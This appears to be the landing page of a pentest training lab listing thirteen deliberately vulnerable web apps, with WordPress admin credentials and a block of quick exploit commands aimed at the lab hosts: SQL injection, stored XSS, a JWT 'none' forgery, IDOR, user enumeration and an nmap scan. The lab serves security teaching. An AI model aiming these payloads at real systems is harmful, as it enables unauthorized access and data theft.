⚡ Vulnerable Lab

Pentest training environment — 10 vulnerable applications

cahyo.web.id

📋 App List

| # | Name | URL | Technologies | Level | Vulns |
|---|------|-----|--------------|-------|-------|
| 1 | Vulnerable News Portal | portal-vuln.cahyo.web.id | Nginx, PHP, MySQL | Beginner | SQLi, XSS |
| 2 | Vulnerable WordPress 5.0 | wp-vuln.cahyo.web.id | Nginx, WordPress, MySQL | Beginner | Upload RCE, SQLi |
| 3 | Vulnerable WordPress 4.7 | wps-vuln.cahyo.web.id | Nginx, WordPress, MySQL | Beginner | Stored XSS |
| 4 | Vulnerable Library | lib-vuln.cahyo.web.id | Nginx, Python, SQLite | Beginner | SQLi, IDOR |
| 5 | Vulnerable Ticket | ticket-vuln.cahyo.web.id | Nginx, PHP, MySQL | Beginner++ | SQLi, Upload RCE, IDOR |
| 6 | Vulnerable Jobseeker | jobportal-vuln.cahyo.web.id | VueJS, Golang, MySQL | Beginner++ | SQLi, Path Traversal |
| 7 | Vulnerable API | api-vuln.cahyo.web.id | Nginx, Python, SQLite | Intermediate | JWT None, IDOR |
| 8 | Vulnerable API Auth | loginapi-vuln.cahyo.web.id | Nginx, Python, SQLite | Beginner++ | JWT Weak, User Enum |
| 9 | Vulnerable Server | server-vuln.cahyo.web.id | Metasploitable 2 | Intermediate | Many Vulns |
| 10 | OWASP Juice Shop | juice-vuln.cahyo.web.id | Node.js, Express, SQLite | Intermediate | SQLi, XSS, RCE |
| 11 | WebGoat | webgoat-vuln.cahyo.web.id | Java, Spring Boot | Intermediate | SQLi, XSS, RCE |
| 12 | WebWolf | webwolf-vuln.cahyo.web.id | Java, Spring Boot | Beginner | File Upload |
| 13 | Vulnerable Laravel | laravel-vuln.cahyo.web.id | PHP, Laravel 5, MySQL | Intermediate | SQLi, RCE, Deserialization |

🔐 Credentials

| App | Username | Password | Note |
|-----|----------|----------|------|
| WordPress 5.0 | admin | admin123 | wp-vuln.cahyo.web.id/wp-admin |
| WordPress 4.7 | admin | admin123 | wps-vuln.cahyo.web.id/wp-admin |

🎯 Quick Exploit Commands

```bash
# SQLi Portal
curl "http://portal-vuln.cahyo.web.id/?id=1' OR '1'='1"

# WP 5.0 - SQLi
curl "http://wp-vuln.cahyo.web.id/wp-content/plugins/vuln-sqli/vuln-sqli.php?id=1' OR '1'='1"

# WP 4.7 - Stored XSS
curl -X POST "http://wps-vuln.cahyo.web.id/wp-content/plugins/vuln-guestbook/vuln-guestbook.php" \
  -d "name=<script>alert(1)</script>&message=test&submit=Submit"

# Library - IDOR
curl "http://lib-vuln.cahyo.web.id/books/1" -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoxLCJyb2xlIjoidXNlciJ9.xxxxx"

# API - JWT None Algorithm
curl -H "Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ." http://api-vuln.cahyo.web.id/admin

# LoginAPI - User Enumeration
curl -X POST "http://loginapi-vuln.cahyo.web.id/login" \
  -H "Content-Type: application/json" \
  -d '{"username":"admin","password":"wrong"}'

# Metasploitable - Port Scan
nmap server-vuln.cahyo.web.id
```

⚠️ Warning: This is a deliberately vulnerable environment for authorized pentest training only. Do not deploy publicly without proper isolation.